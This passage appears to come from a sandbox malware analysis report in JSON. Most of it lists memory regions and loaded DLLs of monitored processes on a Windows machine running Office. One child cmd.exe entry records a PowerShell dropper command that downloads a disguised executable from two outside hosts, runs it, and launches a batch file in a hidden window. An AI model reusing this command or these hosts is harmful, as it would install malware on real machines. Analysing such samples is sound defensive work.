"norm_filename": "c:\\windows\\system32\\dwrite.dll", "region_type": "memory_mapped_file", "start_va": 8791417487360, "timestamp": "00:00:23.007", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 80654336, "start_va": 8791419060224, "type": "region", "version": 1 }, "end_va": 8791499714559, "entry_point": 8791419060224, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSORES.DLL", "id": "region_249", "name": "msores.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\msores.dll", "region_type": "memory_mapped_file", "start_va": 8791419060224, "timestamp": "00:00:23.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36376576, "start_va": 8791499735040, "type": "region", "version": 1 }, "end_va": 8791536111615, "entry_point": 8791499735040, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL", "id": "region_250", "name": "mso.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\mso.dll", "region_type": "memory_mapped_file", "start_va": 8791499735040, "timestamp": "00:00:23.023", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 27783168, "start_va": 8791536173056, "type": "region", "version": 1 }, "end_va": 8791563956223, "entry_point": 8791536173056, "filename": "\\Program Files\\Microsoft Office\\Office15\\WWLIB.DLL", "id": "region_251", "name": "wwlib.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\wwlib.dll", "region_type": "memory_mapped_file", "start_va": 8791536173056, "timestamp": "00:00:23.121", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 888832, "start_va": 8791564156928, "type": "region", "version": 1 }, "end_va": 8791565045759, "entry_point": 8791564156928, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\ADAL.DLL", "id": "region_252", "name": "adal.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\adal.dll", "region_type": "memory_mapped_file", "start_va": 8791564156928, "timestamp": "00:00:23.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1900544, "start_va": 8791565074432, "type": "region", "version": 1 }, "end_va": 8791566974975, "entry_point": 8791565074432, "filename": "\\Windows\\System32\\d3d10warp.dll", "id": "region_253", "name": "d3d10warp.dll", "norm_filename": "c:\\windows\\system32\\d3d10warp.dll", "region_type": "memory_mapped_file", "start_va": 8791565074432, "timestamp": "00:00:23.150", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3633152, "start_va": 8791566974976, "type": "region", "version": 1 }, "end_va": 8791570608127, "entry_point": 8791566974976, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\1033\\MSOINTL.DLL", "id": "region_254", "name": "msointl.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\1033\\msointl.dll", "region_type": "memory_mapped_file", "start_va": 8791566974976, "timestamp": "00:00:23.157", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 21053440, "start_va": 8791570644992, "type": "region", "version": 1 }, "end_va": 8791591698431, "entry_point": 8791570644992, "filename": "\\Program Files\\Microsoft Office\\Office15\\OART.DLL", "id": "region_255", "name": "oart.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\oart.dll", "region_type": "memory_mapped_file", "start_va": 8791570644992, "timestamp": "00:00:23.160", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791593713664, "type": "region", "version": 1 }, "end_va": 8791594340351, "entry_point": 8791593713664, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_256", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791593713664, "timestamp": "00:00:23.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 811008, "start_va": 8791594369024, "type": "region", "version": 1 }, "end_va": 8791595180031, "entry_point": 8791594369024, "filename": "\\Windows\\System32\\d3d11.dll", "id": "region_257", "name": "d3d11.dll", "norm_filename": "c:\\windows\\system32\\d3d11.dll", "region_type": "memory_mapped_file", "start_va": 8791594369024, "timestamp": "00:00:23.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1531904, "start_va": 8791595220992, "type": "region", "version": 1 }, "end_va": 8791596752895, "entry_point": 8791595220992, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSPTLS.DLL", "id": "region_258", "name": "msptls.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\msptls.dll", "region_type": "memory_mapped_file", "start_va": 8791595220992, "timestamp": "00:00:23.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 925696, "start_va": 8791596793856, "type": "region", "version": 1 }, "end_va": 8791597719551, "entry_point": 8791596793856, "filename": "\\Windows\\System32\\d2d1.dll", "id": "region_259", "name": "d2d1.dll", "norm_filename": "c:\\windows\\system32\\d2d1.dll", "region_type": "memory_mapped_file", "start_va": 8791596793856, "timestamp": "00:00:23.251", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 8791599349760, "type": "region", "version": 1 }, "end_va": 8791599464447, "entry_point": 8791599349760, "filename": "\\Program Files\\Microsoft Office\\Office15\\MSOHEV.DLL", "id": "region_260", "name": "msohev.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\msohev.dll", "region_type": "memory_mapped_file", "start_va": 8791599349760, "timestamp": "00:00:23.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791599480832, "type": "region", "version": 1 }, "end_va": 8791599935487, "entry_point": 8791599480832, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_261", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791599480832, "timestamp": "00:00:23.265", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 8791599939584, "type": "region", "version": 1 }, "end_va": 8791600807935, "entry_point": 8791599939584, "filename": "\\Program Files\\Microsoft Office\\Office15\\1033\\WWINTL.DLL", "id": "region_262", "name": "wwintl.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\1033\\wwintl.dll", "region_type": "memory_mapped_file", "start_va": 8791599939584, "timestamp": "00:00:23.280", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791600857088, "type": "region", "version": 1 }, "end_va": 8791600885759, "entry_point": 8791600857088, "filename": "\\Windows\\System32\\msimg32.dll", "id": "region_263", "name": "msimg32.dll", "norm_filename": "c:\\windows\\system32\\msimg32.dll", "region_type": "memory_mapped_file", "start_va": 8791600857088, "timestamp": "00:00:23.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2039808, "start_va": 8791657349120, "type": "region", "version": 1 }, "end_va": 8791659388927, "entry_point": 8791657349120, "filename": "\\Windows\\System32\\msxml6.dll", "id": "region_264", "name": "msxml6.dll", "norm_filename": "c:\\windows\\system32\\msxml6.dll", "region_type": "memory_mapped_file", "start_va": 8791657349120, "timestamp": "00:00:23.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791660036096, "type": "region", "version": 1 }, "end_va": 8791660498943, "entry_point": 8791660036096, "filename": "\\Windows\\System32\\winspool.drv", "id": "region_265", "name": "winspool.drv", "norm_filename": "c:\\windows\\system32\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 8791660036096, "timestamp": "00:00:23.308", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5242880, "start_va": 8791685464064, "type": "region", "version": 1 }, "end_va": 8791690706943, "entry_point": 8791685464064, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\Cultures\\OFFICE.ODF", "id": "region_266", "name": "office.odf", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf", "region_type": "memory_mapped_file", "start_va": 8791685464064, "timestamp": "00:00:23.317", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3235840, "start_va": 8791690706944, "type": "region", "version": 1 }, "end_va": 8791693942783, "entry_point": 8791690706944, "filename": "\\Windows\\System32\\msi.dll", "id": "region_267", "name": "msi.dll", "norm_filename": "c:\\windows\\system32\\msi.dll", "region_type": "memory_mapped_file", "start_va": 8791690706944, "timestamp": "00:00:23.320", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 684032, "start_va": 8791698636800, "type": "region", "version": 1 }, "end_va": 8791699320831, "entry_point": 8791698636800, "filename": "\\Windows\\System32\\dxgi.dll", "id": "region_268", "name": "dxgi.dll", "norm_filename": "c:\\windows\\system32\\dxgi.dll", "region_type": "memory_mapped_file", "start_va": 8791698636800, "timestamp": "00:00:23.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 348160, "start_va": 8791699357696, "type": "region", "version": 1 }, "end_va": 8791699705855, "entry_point": 8791699357696, "filename": "\\Windows\\System32\\d3d10_1core.dll", "id": "region_269", "name": "d3d10_1core.dll", "norm_filename": "c:\\windows\\system32\\d3d10_1core.dll", "region_type": "memory_mapped_file", "start_va": 8791699357696, "timestamp": "00:00:23.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791699750912, "type": "region", "version": 1 }, "end_va": 8791699963903, "entry_point": 8791699750912, "filename": "\\Windows\\System32\\d3d10_1.dll", "id": "region_270", "name": "d3d10_1.dll", "norm_filename": "c:\\windows\\system32\\d3d10_1.dll", "region_type": "memory_mapped_file", "start_va": 8791699750912, "timestamp": "00:00:23.419", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 409600, "start_va": 8791702634496, "type": "region", "version": 1 }, "end_va": 8791703044095, "entry_point": 8791702634496, "filename": "\\Windows\\System32\\webio.dll", "id": "region_271", "name": "webio.dll", "norm_filename": "c:\\windows\\system32\\webio.dll", "region_type": "memory_mapped_file", "start_va": 8791702634496, "timestamp": "00:00:23.427", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791703093248, "type": "region", "version": 1 }, "end_va": 8791703556095, "entry_point": 8791703093248, "filename": "\\Windows\\System32\\winhttp.dll", "id": "region_272", "name": "winhttp.dll", "norm_filename": "c:\\windows\\system32\\winhttp.dll", "region_type": "memory_mapped_file", "start_va": 8791703093248, "timestamp": "00:00:23.430", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1220608, "start_va": 8791711612928, "type": "region", "version": 1 }, "end_va": 8791712833535, "entry_point": 8791711612928, "filename": "\\Windows\\System32\\WindowsCodecs.dll", "id": "region_273", "name": "windowscodecs.dll", "norm_filename": "c:\\windows\\system32\\windowscodecs.dll", "region_type": "memory_mapped_file", "start_va": 8791711612928, "timestamp": "00:00:23.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791712858112, "type": "region", "version": 1 }, "end_va": 8791712956415, "entry_point": 8791712858112, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_274", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 8791712858112, "timestamp": "00:00:23.452", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2183168, "start_va": 8791714693120, "type": "region", "version": 1 }, "end_va": 8791716876287, "entry_point": 8791714693120, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll", "id": "region_275", "name": "gdiplus.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll", "region_type": "memory_mapped_file", "start_va": 8791714693120, "timestamp": "00:00:23.462", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791716921344, "type": "region", "version": 1 }, "end_va": 8791717273599, "entry_point": 8791716921344, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_276", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791716921344, "timestamp": "00:00:23.477", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 8791723933696, "type": "region", "version": 1 }, "end_va": 8791724003327, "entry_point": 8791723933696, "filename": "\\Windows\\System32\\wtsapi32.dll", "id": "region_277", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\system32\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791723933696, "timestamp": "00:00:23.488", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791728717824, "type": "region", "version": 1 }, "end_va": 8791728902143, "entry_point": 8791728717824, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_278", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791728717824, "timestamp": "00:00:23.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 8791729111040, "type": "region", "version": 1 }, "end_va": 8791730339839, "entry_point": 8791729111040, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_279", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 8791729111040, "timestamp": "00:00:23.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791730683904, "type": "region", "version": 1 }, "end_va": 8791732731903, "entry_point": 8791730683904, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_280", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791730683904, "timestamp": "00:00:23.522", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791737565184, "type": "region", "version": 1 }, "end_va": 8791737614335, "entry_point": 8791737565184, "filename": "\\Windows\\System32\\version.dll", "id": "region_281", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791737565184, "timestamp": "00:00:23.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791741825024, "type": "region", "version": 1 }, "end_va": 8791742115839, "entry_point": 8791741825024, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_282", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791741825024, "timestamp": "00:00:23.541", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "cmd /c PowerShell \"'PowerShell \"\"function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''%TMP%\\Mvmubw.exe'');Start-Process ''%TMP%\\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'\"\" | Out-File -encoding ASCII -FilePath %TMP%\\Mbovxo.bat;Start-Process '%TMP%\\Mbovxo.bat' -WindowStyle Hidden\"", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_2", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 2, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000002-region_00000442-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_24", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_442", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:36.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_443", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:36.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_444", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:36.454", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000445-addr_0x0000000000130000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_25", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 2293759, "entry_point": 0, "filename": null, "id": "region_445", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:00:36.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 364544, "start_va": 1239875584, "type": "region", "version": 1 }, "end_va": 1240240127, "entry_point": 1239875584, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_446", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1239875584, "timestamp": "00:00:36.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2001993728, "type": "region", "version": 1 }, "end_va": 2003734527, "entry_point": 2001993728, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_447", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2001993728, "timestamp": "00:00:36.477", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_448", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:36.478", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000449-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_26", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_449", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:36.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791790059520, "type": "region", "version": 1 }, "end_va": 8791790063615, "entry_point": 8791790059520, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_450", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791790059520, "timestamp": "00:00:36.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_451", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:00:36.483", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000452-addr_0x000007fffffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_27", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092878847, "entry_point": 0, "filename": null, "id": "region_452", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:00:36.484", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000453-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_28", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_453", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:00:36.484", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000454-addr_0x0000000000370000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_29", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_454", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:00:36.663", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1999765504, "type": "region", "version": 1 }, "end_va": 2000941055, "entry_point": 1999855264, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_455", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1999765504, "timestamp": "00:00:36.663", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791754539008, "type": "region", "version": 1 }, "end_va": 8791754977279, "entry_point": 8791754551520, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_456", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754539008, "timestamp": "00:00:36.664", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_457", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:36.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_458", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:36.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_459", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:36.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2000945152, "type": "region", "version": 1 }, "end_va": 2001969151, "entry_point": 2001052360, "filename": "\\Windows\\System32\\user32.dll", "id": "region_460", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2000945152, 